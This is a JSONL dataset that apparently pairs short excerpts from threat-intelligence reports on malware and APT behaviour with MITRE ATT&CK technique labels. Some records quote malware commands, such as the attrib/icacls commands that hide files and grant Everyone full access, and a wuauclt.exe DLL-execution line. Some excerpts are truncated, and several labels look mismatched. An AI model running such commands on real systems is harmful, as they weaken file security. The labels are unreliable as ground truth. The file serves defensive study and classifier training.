{"text1":"Close analysis of the delivered payloads and legitimate resources retrieved from URLs by the first stage malware dropper reveals that TA416 is once again using an updated version of PlugX malware to target their victims. Historically, the group has relied on a variety of legitimate antivirus files, including the Avast file resource wsc_proxy.exe, to begin the process of DLL search order hijacking that results in PlugX malware installation. In the January 2022 campaigns, TA416 used the PE file potplayermini.exe to initiate DLL search order hijacking. This is a legitimate executable file that is part of the publicly available media player Daum PotPlayer 1.5.29825, which Mandiant has previously\u00a0documented\u00a0as being susceptible to search order hijacking since at least 2016. The file DocConvDll.dll has also intermittently been used as a loader of the PlugX DAT configuration files. For those that are familiar with TA416\u2019s historic tactics, techniques, and procedures (TTPs), this is highly similar to the Trident Loader method which the group used to install PlugX in previous campaigns","labels":"['T1574.001']"}
{"text1":"Password from successful login to the infected server: Whenever someone logs in a system infected with Linux\/Ebury, the\u00a0sshd\u00a0daemon will save the password and send it to the exfiltration server. Password on successful login from the infected server: When someone uses the\u00a0ssh\u00a0client on an infected server, Linux\/Ebury will intercept the password and sent it to its exfiltration server. Private key passphrase: When the\u00a0ssh\u00a0client on an infected server prompts the user for an private key passphrase, the passphrase will be sent to the remote exfiltration server. Unencrypted private key: When a private key is used to authenticate to a remote server, the unencrypted version is intercepted by the malware. Unlike passwords, it will not send the key to the exfiltration server. Instead, it will store it memory and wait for the operators to fetch the key with the\u00a0Xcat\u00a0command. Private keys added to the OpenSSH agent with\u00a0ssh-add: The keys added to an OpenSSH agent are also intercepted by the malware. Both the unencrypted key itself and the passphrase typed by the user will be logged","labels":"['T1552.004']"}
{"text1":"Details: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe. Writing an analytic looking for a process of esentutl.exe with Windows\\WebCache in the command line may help you catch this behavior","labels":"['T1005']"}
{"text1":"Executes VBScript using Process.Start. Next, the DLL loads an embedded resource named \"78c855a088924e92a7f60d661c3d1845\" into memory and decrypts it using multiple XOR operations. Loads the resource using Assembly.GetManifestResourceStream. Method that performs the XOR decryption. The decrypted resource is a DLL file embedded with two resources named \"AdvancedRun\" and \"Waqybg\" that are compressed with GZip. Two resources embedded in the decrypted resource. The third-stage DLL proceeds by loading the \"AdvancedRun\" resource into memory, decompressing it and dropping it as \"AdvancedRun.exe\" into the %TEMP% directory. Calling GZipStream class to decompress the resource. Drops AdvancedRun.exe using File.WriteAllBytes. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files","labels":"['T1140']"}
{"text1":"When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named \u201cvmtoolsd. Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name \u2018MSASCuiLTasks\u2019 in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence. Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1","labels":"['T1497.001']"}
{"text1":"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1547.001']"}
{"text1":"Raindrop is compiled as a DLL, which is built from a modified version of 7-Zip source code. The 7-Zip code is not utilized and is designed to hide malicious functionality added by the attackers. The DLL is compiled where the Name file of the Export Directory Table is \u201c\"7-zip.dll\" and the Export Names are","labels":"['T1036']"}
{"text1":"Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4:\u00a0Given the threat actor\u2019s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL Logs keystrokes to %userprofile%\\appdata\\roaming\\apach. Figure 5: Certificate used to sign MECHANICAL\/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site","labels":"['T1555.003']"}
{"text1":"In both cases, Group5 disguised the malicious binaries with several layers of obfuscation, including crypting and packing to reduce the possibility of detection by antivirus software","labels":"['T1027']"}
{"text1":"The malware also monitors all fixed and removable drives mapped on the local system. Whenever a new drive is inserted, it creates a list of all the files on the drive and stores it encrypted in a file","labels":"['T1119']"}
{"text1":"This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Tools and binaries used by the attackers (e.g. ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. Before running intensive and continued hands-on keyboard activity, the attackers took care of disabling event logging using AUDITPOL and re-enabling it afterward. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services. We believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments","labels":"['T1047']"}
{"text1":"The sample arrives as an app bundled in a Zip archive. It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file","labels":"['T1036.004']"}
{"text1":"The majority of 2017 and 2018 Karagany samples analyzed by CTU researchers were packed using a custom packer, albeit a reasonably simple one that performs a number of binary shifts and logic operations. Karagany campaigns in 2016 and prior typically used the UPX packer as an additional layer of obfuscation, but this behavior was not observed in 2017-2018 samples. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis","labels":"['T1027.002']"}
{"text1":"Unlike a Docker engine that runs on a single host, a Kubernetes cluster typically contains more than one host and every host can run multiple containers. Given the abundant resources in a Kubernetes infrastructure, a hijacked Kubernetes cluster can be more profitable than a hijacked Docker host. This new TeamTNT malware campaign is one of the most complicated attacks targeting Kubernetes. This is also the most feature-rich malware we have seen from TeamTNT so far. In particular, the threat actor has developed more sophisticated tactics for initial access, execution, defense evasion and C2. Although the malware is still under development and the campaign is not yet widely spread, we believe the attacker will soon mature the tools and start a large-scale deployment","labels":"['T1133']"}
{"text1":"OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell. The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries","labels":"['T1036.005']"}
{"text1":"The instrumentor script also performs a cleanup of the cookies for Google Chrome and Microsoft Edge browsers. This is done by simply terminating any browser processes running on the system and then deleting the cookie files on disk","labels":"['T1555.003']"}
{"text1":"They renamed their files to make them look like legitimate files, for example, trilog.exe, named after a legitimate Schneider Electric application","labels":"['T1036.005']"}
{"text1":"After a user logs on, a variety of credentials are generated and stored in the\u00a0Local Security Authority Subsystem Service, LSASS, process in memory. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn\u2019t prevent the system from generating the LM hash in memory. By default, Windows Server 2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and \u201cclear-text\u201d password are no longer in memory. This functionality was also \u201cback-ported\u201d to earlier versions of Windows (Windows 7\/8\/2008R2\/2012) in kb2871997, though in order to prevent the \u201cclear-text\u201d password from being placed in LSASS, the following registry key needs to be set to \u201c0\u201d (Digest Disabled","labels":"['T1098']"}
{"text1":"Much like the known actors Miniduke or CommentCrew, it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands","labels":"['T1102.001']"}
{"text1":"Lateral movement began around 28 hours after initial entry, using SMB to drop a Cobalt Strike Beacon on a domain controller. From there, the threat actor used WMIC to execute the beacon","labels":"['T1021.002']"}
{"text1":"Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Posted by Sergei Shevchenko at Labels: Agent.btz Newer Post Older Post Home","labels":"['T1016']"}
{"text1":"Seaduke delivery The attackers control Cozyduke via compromised websites, issuing instructions to infected machines by uploading \u201ctasks\u201d to a database file. Cozyduke will periodically contact these websites to retrieve task information to be executed on the local machine. One such task (an encoded PowerShell script) instructed Cozyduke to download and execute Seaduke from a compromised website","labels":"['T1059.001']"}
{"text1":"After this data has been aggregated, it is uploaded to a hardcoded command and control (C2) server via HTTP. The data is embedded within the \u2018Cookie\u2019 HTTP header, as seen below","labels":"['T1071.001']"}
{"text1":"Persistence: Creates a Windows RUN registry key for persistence. The name of the key is: \"Dropbox Update Setup\". This name was consistent in all the samples. This key points to the location of the Python-compiled binary in the %appdata% directory to ensure that it is started automatically each time the system is\u00a0rebooted","labels":"['T1036.004', 'T1547.001']"}
{"text1":"If you continue browsing the site, you agree to the use of cookies on this website. If you continue browsing the site, you agree to the use of cookies on this website. Home - Explore Submit Search . - Upload - Login - Signup - Upload - Home - Explore - Login - Signup Activate your 30 day free trial\u00a0to unlock unlimited reading. Facebook - Twitter - LinkedIn - Share - Email - - No Easy Breach DerbyCon 2016 . 22 . Share . Download to read offline . Every IR presents unique challenges. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. All rights reserved.24 Our Response: Increased PowerShell Visibility \u2022 Upgraded the environment to PowerShell 3.0 and enabled logging \u2022 Logging captured input\/output, variable initialization, etc. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity \u2022 Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. Unlimited Reading . Learn faster and smarter from top experts . Unlimited Downloading . Download to take your learnings offline and on the go . You also get free access to Scribd","labels":"['T1059.001']"}
{"text1":"The samples install\u00a0HTTPBrowser at %APPDATA%\/wdm.exe. Persistence is established via the HKCUSoftwareMicrosoftWindowsCurrentVersionRun key value for wdm\u00a0set to the path of the executable. Previous samples have set persistence via Run key values for 360v","labels":"['T1547.001']"}
{"text1":"Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. Running in RAM Cobalt Strike modules aren't stored in the file system; their executable code can only be found in RAM. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP\/HTTPS\/DNS modules and SMB modules. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP\/HTTPS\/DNS module. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Connect to another computer using PsExec.exe (the remote access program is included in the Microsoft SysInternals suite), copy the module, and run it; delete the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1219']"}
{"text1":"A configuration file resides in a file under the backdoor\u2019s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values \u20180\u2019 or \u20181\u2019 and also adds itself to the configuration file. Other than the state command, all commands in the configuration file are identified by their hash\u2019s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it","labels":"['T1547.001']"}
{"text1":"The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows. The exploit uses CVE-2015-1701 to execute a callback in userspace. The callback gets the EPROCESS structures of the current process and the System process, and copies data from the System token into the token of the current process. Upon completion, the payload continues execution in usermode with the privileges of the System process","labels":"['T1134.001']"}
{"text1":"Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network\u2019s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router","labels":"['T1021.004']"}
{"text1":"If the process is running with Low integrity, REvil terminates the current process and launches another instance of itself via ShellExecute using the \"runas\" command, which executes the new instance with administrative rights","labels":"['T1134.002']"}
{"text1":"A Web Shell is a file containing backdoor functionality written in a web scripting language such ASP, ASPX, PHP or JSP. When a web shell is hosted on an internet facing victim system, an adversary can remotely access the system to perform malicious actions. Deep Panda is a China based threat group CrowdStrike has observed targeting companies in the defense, legal, telecommunication and financial industries. Crowdstrike has observed Deep Panda adopting web shells as their primary access back into a victim organization. This is an interesting shift as web shells have typically been seen as only a first stage into obtaining a persistent foothold in an environment. Previously, web shells were quickly abandoned once persistent second stage malware was successfully beaconing. Using a web shell as a primary backdoor gives Deep Panda several advantages","labels":"['T1505.003']"}
{"text1":"The RDAT sample with the novel EWS C2 channel also had HTTP and DNS tunneling as C2 channels as well, which are very similar to other RDAT samples we collected. The HTTP C2 channel uses HTTP POST requests to transmit data to the C2 server","labels":"['T1030']"}
{"text1":"We have identified 127 different domains used to host Silent Librarian phishing sites since 2013. Like a growing number of phishing sites, domains registered by Silent Librarian generally use Freenom top-level domains (TLDs) (.TK, . CF, .GA, .GQ, .ML) because they are available at no cost. The group has used domains on other TLDs, though rather sparingly. Some of the other recent TLDs associated with Silent Librarian domains include .IN, .IR, .INFO, .LINK, and .TOP","labels":"['T1583.001']"}
{"text1":"One of the Cl0p variants encrypts the files by generating an RSA public key, retrieving its first 127 bytes and using them as the RC4 key, adding the Cl0p^_- header and the RC4 encrypting it again. Once the files are encrypted, the Cl0p extension will be added to each encrypted file","labels":"['T1486']"}
{"text1":"The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings","labels":"['T1082']"}
{"text1":"Additionally, Microsoft warned that this vulnerability could be used in the crafting of a wormable exploit. The Common Vulnerabilities and Exposures (CVE) site references this vulnerability as CVE-2008-4250","labels":"['T1210']"}
{"text1":"Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container. More specifically, it links its local containerized X drive to the host\u2019s C drive","labels":"['T1611']"}
{"text1":"To check the host language, it queries the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\\ and the value InstallLanguage. If the machine has the value 0419 (Russian), 0422 (Ukrainian) or 0423 (Belarusian), it call ExitProcess\u00a0to stop executing","labels":"['T1614.001']"}
{"text1":"A custom executable that only contains the Metasploit shellcode. This is used to maintain access to a Meterpreter session. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8","labels":"['T1059.001']"}
{"text1":"After initialization, the code monitors browser activities, looking for online banking sessions. Once these are found, the malware enables the attacker to display an overlay window in front of the victim\u2019s browser to manipulate the user\u2019s session in the background. In this way, the fraudulent transaction is performed from the victim\u2019s machine, making it harder to detect for anti-fraud solutions on the bank\u2019s end. The criminal can also request specific information, asked during the bank transaction, such as a secondary password and token, bypassing two-factor authentication solutions adopted by the financial sector","labels":"['T1185', 'T1185']"}
{"text1":"All the text files are now packed into the archive temp.zip (%temp%\\temp.zip) - zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt - txt is uploaded to the control server","labels":"['T1560', 'T1074.001']"}
{"text1":"Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks . Get Free Account . Join Now . Introduction . TeamTNT is a cybercrime group that targets cloud environments including Docker and Kubernetes instances. TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims\u2019 servers. The uniqueness of the recent attack observed by Intezer is the group abuses a legitimate open source tool called Weave Scope to gain full control over the victim\u2019s cloud infrastructure. By installing a legitimate tool such as Weave Scope the attackers reap all the benefits as if they had installed a backdoor on the server, with significantly less effort and without needing to use malware. To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. Once installed, the attackers can connect to the Weave Scope dashboard via HTTP on port 4040 and gain full visibility and control over the victim\u2019s infrastructure. To protect yourself from this attack we recommend to: - Close exposed Docker API ports: This attack takes advantage of a common misconfiguration of the Docker API which gives the attacker full control over the Docker service. Therefore, Docker API ports should be closed or contain restricted access policies in the firewall. Block incoming connections to port 4040: Weave Scope uses default port 4040 to make the dashboard accessible and anyone with access to the network can view the dashboard. Update from Weave Works . Weave Works has since provided this in-depth article on how to prevent malicious attacks using Weave Scope","labels":"['T1133']"}
{"text1":"As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Use an advanced endpoint threat detection (AETD) solution to monitor activity on network endpoints. Also implement strict security controls for privileged accounts such as Active Directory administrator to prevent access by an unauthorized user","labels":"['T1036.005']"}
{"text1":"Upon initial execution, the Windows Registry is checked to determine if DarkWatchman has already been installed. The malware stores its configuration in \u2018\\\\HKCU\\Software\\Microsoft\\Windows\\DWM\\\u2018, using registry keys that consist of a uid generated from the serial number of the C: drive and appended with a single digit or character. Installation is denoted by uid + 0 (eg: abc1230) \u2013 if the malware does not find a \u20181\u2018 flag in this key, it runs its install function","labels":"['T1012']"}
{"text1":"This variant uses an 8-byte XOR key to obfuscate API names and other strings within the payload (Figure 5). Figure 5: 8-Byte XOR Key for obfuscation","labels":"['T1027']"}
{"text1":"TrailBlazer is a sophisticated malware family that provides modular functionality and a very low prevalence. TrailBlazer persists on a compromised host using WMI event subscriptions4 \u2014 a technique also used by SeaDuke \u2014 although this persistence mechanism is not exclusive to COZY BEAR.5","labels":"['T1001.001']"}
{"text1":"A key trait of NOBELIUM\u2019s ongoing activity over the last year has been the abuse of indirect paths and trust relationships to target and gain access to victims of interest for intelligence gain. In the most recent campaign, this has manifested in a compromise-one-to-compromise-many approach\u2014exploiting the service providers\u2019 trust chain to gain broad access to multiple customer tenants for subsequent attacks. NOBELIUM leverages established standard business practices, to target downstream customers across multiple managed tenants. These delegated administrative privileges are often neither audited for approved use nor disabled by a service provider or downstream customer once use has ended, leaving them active until removed by the administrators. If NOBELIUM has compromised the accounts tied to delegated administrative privileges through other credential-stealing attacks, that access grants actors like NOBELIUM persistence for ongoing campaigns","labels":"['T1199']"}
{"text1":"To avoid being run in sandboxes and emulators, all MegaCortex versions implement file encryption threading based on querying for the number of CPUs in the system. All MegaCortex versions can detect if the binary is running with administrator privileges","labels":"['T1497.001']"}
{"text1":"GALLIUM primarily relies on compromised domain credentials to move through the target network, and as outlined above, uses several credential harvesting tools. Once they have acquired credentials, the activity group uses PsExec extensively to move laterally between hosts in the target network","labels":"['T1570']"}
{"text1":"Before being hashed, the character \u201c0\u201d or \u201c1\u201d is appended to the return value indicating root privileges. This clientID is stored in \/Library\/Storage\/File System\/HFS\/25cf5d02-e50b-4288-870a-528d56c3cf6e\/pivtoken.appex if the code runs as root, or in ~\/Library\/SmartCardsServices\/Technology\/PlugIns\/drivers\/snippets.ecgML otherwise. This file is normally hidden via the _chflags function and its timestamp is modified using the \u201ctouch \u2013t\u201d command with a random value","labels":"['T1070.006']"}
{"text1":"After dropping these files to its working directory, the malware attempts to change the attributes of all the files to \u201chidden\u201d and grant full access to all files in the current directory and any directories below. It does this by executing \u201cattrib +h .\u201d, followed by \u201cicacls . \/grant Everyone:F \/T \/C \/Q","labels":"['T1222.001']"}
{"text1":"The actors used valid credentials obtained\u00a0using\u00a0MimiKatz variants to escalate privileges. We\u2019ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON. Actors have gained access to credentials via exported copies of\u00a0the ntds.dit\u00a0Active Directory database and SYSTEM and SECURITY\u00a0registry hives from a Domain Controller","labels":"['T1003.003']"}
{"text1":"We analyzed a new RATANKBA variant that uses a PowerShell script instead of its more traditional PE executable form","labels":"['T1059.001']"}
{"text1":"The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS","labels":"['T1189']"}
{"text1":"FIVEHANDS can receive a CLI argument for a path, this limits the ransomware's file encryption activities to the specified directory. DEATHRANSOM and HELLOKITTY do not accept CLI arguments","labels":"['T1059']"}
{"text1":"TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON","labels":"['T1027', 'T1140']"}
{"text1":"However the application is not a service of Yahoo or a legitimate product of McAfee, but a rogue application used by Pawn Storm. Clicking on the \u201cAgree\u201d button would give Pawn Storm an OAuth token and access to the targets\u2019 mailbox. The group then gains access to the mailbox until the token gets revoked by the service provider or the target","labels":"['T1550.001']"}
{"text1":"If this function is successfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe. The Rundll32Call exported function begins by creating a named event named \u2018RunOnce\u2019. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3","labels":"['T1218.011']"}
{"text1":"Command_Create&Inject: This command creates a new process (using a supplied filename as the process name) and then injects malicious code into it","labels":"['T1055']"}
{"text1":"In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted","labels":"['T1087.001']"}
{"text1":"The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script \u201csymantec_help.jsp\u201d contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access","labels":"['T1036']"}
{"text1":"This file is a USB file stealer which can be also guessed by its internal name \"USBgrabber.dll\". However, the implementation is sloppy which makes it a file stealer for any newly connected logical volume on a system. This is because the malware monitors the computer for messages WM_COMMAND and WM_DEVICECHANGE, but not verifying if a USB drive was connected","labels":"['T1025']"}
{"text1":"The job of the smaller of the two JavaScripts is to establish a system autostart mechanism. It accomplishes this by deobfuscating another script, link.js, into %TMP%. Link.js in turn creates a shortcut file \"Java(TM) Platform SE Auto Updater.lnk\" in the \"Startup\" special folder pointing to the main backdoor JavaScript","labels":"['T1547.001', 'T1547.009']"}
{"text1":"After the deletion process, the malware gets the function \u201cWow64RevertWow64FsRedirection\u201d using the function \u201cGetProcAddress\u201d and calls it in a dynamic way to leave the system in the same state as before","labels":"['T1070']"}
{"text1":"The \"Office Test\" persistence mechanism allows threat actors to execute a Trojan each time a user runs any of the Office applications. This persistence mechanism loads a malicious DLL by leveraging a registry key that appears to be used during the development and testing of Microsoft Office applications. The use of this registry key for persistence is quite clever, as it requires user interaction to load and execute the malicious payload, which makes automated analysis in sandboxes challenging. Low awareness of this persistence method, coupled with the sandbox evasion obtained from user interactions, makes this a potentially attractive persistence method that we believe may be used in future attacks. Unit 42 suggests monitoring for systems that have this registry key already created, as it is possible a threat is already using the key for persistence purposes. Microsoft has added the \u201cOffice Test\u201d registry keys to its Autoruns tool for detection purposes as well. Also, we suggest disabling this persistence method by creating the \u201cOffice test\u201d registry key in read-only mode as outlined in this blog","labels":"['T1137.002']"}
{"text1":"The malware performs COM hijacking by setting the path to itself to the HKCU\\Software\\Classes\\Folder\\shell\\open\\command key with a DelegateExecute parameter","labels":"['T1546.015']"}
{"text1":"The plugin begins by collecting the username of the running process, and determining if it is running under the SYSTEM account. If running as SYSTEM, the plugin will associate the active desktop with the plugin\u2019s thread","labels":"['T1033']"}
{"text1":"Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. If the switch associated with the execution of Stage 3 was passed to the 'pre_logic' function at the beginning of this stage, the Stage 3 payload will then be executed immediately","labels":"['T1564.004']"}
{"text1":"When executed, Kwampirs decrypts and extracts a copy of its main DLL payload from its resource section. Before writing the payload to disk, it inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections","labels":"['T1140', 'T1027.001']"}
{"text1":"This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw","labels":"['T1220']"}
{"text1":"An additional batch script named \u201cdirsb.bat\u201d was used to gather folder and file names from hosts on the network","labels":"['T1083']"}
{"text1":"The malware can be instructed to search for recently-used documents or other interesting files. It can monitor specific directories and removable devices, report any changes and exfiltrate files of the attackers\u2019 choice","labels":"['T1083']"}
{"text1":"The WhiteBear binary loader maintains several features including two injection methods for its (oddly named) \u201cKernelInjector\u201d subsystem, also named by its developer \u2013 Standart \u2013 WindowInject (includes an unusual technique for remotely placing code into memory for subsequent thread execution","labels":"['T1055.003']"}
{"text1":"The malware then focuses on corrupting the first 512 bytes, the Master Boot Record (MBR) for every Physical Drive. While that should be enough for the device not to boot again, HermeticWiper proceeds to enumerate the partitions for all possible drives","labels":"['T1561.002']"}
{"text1":"The lnk file (WindowsUpdateConf.lnk) executes \u201cC:\\Windows\\system32\\wuauclt.exe\u201d \/UpdateDeploymentProvider C:\\W\u00edndows\\system32\\wuaueng.dll \/RunHandlerComServer. This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms","labels":"['T1218']"}
{"text1":"While the most recent samples observed still use batch scripts and SFX files, the Gamaredon Group has moved away from applications like wget, Remote Manipulator Tool, VNC and ChkFlsh.exe. Instead of using wget the attackers are distributing custom developed downloaders, and instead of Remote Manipulator or VNC the malware is using a custom developed remote access implant","labels":"['T1059.003']"}
{"text1":"One of the documents is called \u201c\u0647\u0645\u0628\u0633\u062a\u06af\u06cc \u0639\u0627\u0634\u0642\u0627\u0646\u0647 \u0628\u0627 \u0639\u0627\u0634\u0642\u0627\u0646 \u0622\u0632\u0627\u062f\u06cc2.doc\u201d (translates from Persian as \u201cRomantic Solidarity With Lovers of Freedom2.doc\u201d) and contains malicious macros that are accompanied by an odd decoy message attempting to convince the victim to enable its content","labels":"['T1204.002']"}
{"text1":"Once the attacker gained access to the network with compromised credentials, they moved laterally using multiple different credentials. The credentials used for lateral movement were always different from those used for remote access","labels":"['T1078']"}
